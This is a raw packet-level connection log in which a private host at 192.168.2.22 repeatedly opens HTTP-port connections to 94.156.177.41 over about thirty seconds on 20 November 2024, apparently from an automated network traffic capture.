Nov 20, 2024 10:11:54.665755033 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.671370983 CET	80	49191	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.397053003 CET	80	49191	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.397164106 CET	80	49191	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.397349119 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.397411108 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.402297974 CET	80	49191	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.526945114 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.534302950 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.534365892 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.536037922 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.543654919 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:55.543704987 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:55.548749924 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.305603981 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.305634022 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.305736065 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.305778027 CET	49192	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.311347008 CET	80	49192	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.450444937 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.457151890 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.457237005 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.459002018 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.465358973 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:56.465409040 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:56.470278978 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.196352005 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.196444035 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.196530104 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.196577072 CET	49193	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.204029083 CET	80	49193	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.337002039 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.344985008 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.345113993 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.346908092 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.354787111 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:57.354850054 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:57.359952927 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.102369070 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.102404118 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.102469921 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.102592945 CET	49194	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.107727051 CET	80	49194	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.239797115 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.245031118 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.245119095 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.246757030 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.251776934 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.251851082 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.256800890 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.990710020 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.990870953 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.990906954 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:58.990968943 CET	49195	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:58.995827913 CET	80	49195	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.140687943 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.145637989 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.145867109 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.147855043 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.153053045 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.153132915 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.159642935 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.906487942 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.906567097 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:59.906869888 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.906869888 CET	49196	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:59.914414883 CET	80	49196	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.045351982 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.053112984 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.053229094 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.055174112 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.062490940 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.062552929 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.070203066 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.919509888 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.919609070 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.919676065 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:00.919749022 CET	49197	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:00.924468040 CET	80	49197	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.068456888 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.073633909 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.074253082 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.076596975 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.085362911 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.086240053 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.093046904 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.961283922 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.961417913 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:01.961463928 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.962191105 CET	49198	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:01.969084024 CET	80	49198	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:02.118271112 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:02.125726938 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:02.125793934 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:02.128051996 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:02.135484934 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:02.135571957 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:02.142585039 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.001914978 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.002110004 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.002197027 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.002407074 CET	49199	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.007930040 CET	80	49199	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.141710997 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.147145033 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.147221088 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.148977041 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.154107094 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:03.154170990 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:03.159845114 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.030916929 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.030949116 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.030989885 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.031055927 CET	49200	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.035991907 CET	80	49200	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.167217016 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.174432993 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.174515963 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.176157951 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.183403969 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:04.183469057 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:04.190939903 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.064814091 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.064851046 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.064968109 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.065013885 CET	49201	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.070421934 CET	80	49201	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.209036112 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.214165926 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.214262962 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.216603041 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.221657991 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.221729994 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.226792097 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.957222939 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.957262993 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:05.957356930 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.957398891 CET	49202	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:05.963805914 CET	80	49202	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.086569071 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.093436956 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.093524933 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.095170975 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.101789951 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.101870060 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.108432055 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.846041918 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.846132040 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.846240044 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.846240044 CET	49203	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.854207993 CET	80	49203	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.978189945 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.984930992 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.986717939 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.986717939 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:06.991899967 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:06.992362022 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.000246048 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.734381914 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.734414101 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.734502077 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.734502077 CET	49204	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.741513968 CET	80	49204	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.866333961 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.871443987 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.871551037 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.873225927 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.878164053 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:07.878232956 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:07.883241892 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.610301018 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.610383987 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.610455990 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.610519886 CET	49205	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.615370989 CET	80	49205	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.743856907 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.750258923 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.750368118 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.751954079 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.760489941 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:08.762365103 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:08.769253969 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.486146927 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.486181974 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.486249924 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.486394882 CET	49206	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.492422104 CET	80	49206	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.624599934 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.629695892 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.629780054 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.632071972 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.636919975 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:09.636982918 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:09.641897917 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.488801956 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.488954067 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.489002943 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.489106894 CET	49207	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.494091034 CET	80	49207	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.637434959 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.645242929 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.645304918 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.647221088 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.654958010 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:10.655009031 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:10.662728071 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.403486013 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.403681040 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.403737068 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.403796911 CET	49208	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.411925077 CET	80	49208	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.536684990 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.541801929 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.541917086 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.543548107 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.548425913 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:11.548573017 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:11.553529978 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.422246933 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.422370911 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.422588110 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.423593998 CET	49209	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.427402020 CET	80	49209	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.571336985 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.576386929 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.576509953 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.578279018 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.583386898 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:12.583478928 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:12.588525057 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.483566999 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.483642101 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.483742952 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.484106064 CET	49210	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.489276886 CET	80	49210	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.623017073 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.628149033 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.628247023 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.629894972 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.635289907 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:13.635351896 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:13.641196012 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.380477905 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.380737066 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.380861044 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.380930901 CET	49211	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.386019945 CET	80	49211	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.656472921 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.661705017 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.661803007 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.663448095 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.668427944 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:14.668489933 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:14.673801899 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.543117046 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.543328047 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.543380976 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.543443918 CET	49212	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.548692942 CET	80	49212	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.680821896 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.685878038 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.685966015 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.687622070 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.692714930 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:15.692785978 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:15.698015928 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.542809010 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.542989016 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.543008089 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.543061972 CET	49213	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.548175097 CET	80	49213	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.694502115 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.701412916 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.701515913 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.703167915 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.709884882 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:16.709953070 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:16.715701103 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.576167107 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.576303005 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.576884031 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.577708960 CET	49214	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.581516027 CET	80	49214	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.721438885 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.729808092 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.729876995 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.731513023 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.740287066 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:17.740345955 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:17.749183893 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:18.599451065 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:18.599553108 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:18.599605083 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:18.599634886 CET	49215	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:18.607116938 CET	80	49215	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:19.463121891 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:19.468369961 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:19.468446016 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:19.470042944 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:19.474968910 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:19.475028992 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:19.483902931 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.249712944 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.249829054 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.249895096 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.249943972 CET	49216	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.254986048 CET	80	49216	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.376661062 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.381787062 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.381855011 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.383630037 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.388670921 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:20.388739109 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:20.393723011 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.119462013 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.119620085 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.119703054 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.119757891 CET	49217	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.124908924 CET	80	49217	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.253772020 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.258955002 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.259071112 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.260699034 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.265769958 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:21.265845060 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:21.271682978 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.167171955 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.167196989 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.167325020 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.170200109 CET	49218	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.175232887 CET	80	49218	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.376374006 CET	49219	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.384577036 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.384670019 CET	49219	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.389425993 CET	49219	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.394526958 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:22.394588947 CET	49219	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:12:22.399507999 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.269963026 CET	80	49219	94.156.177.41	192.168.2.22
Nov 20, 2024 10:12:23.270065069 CET	49219	80	192.168.2.22	94.156.177.41
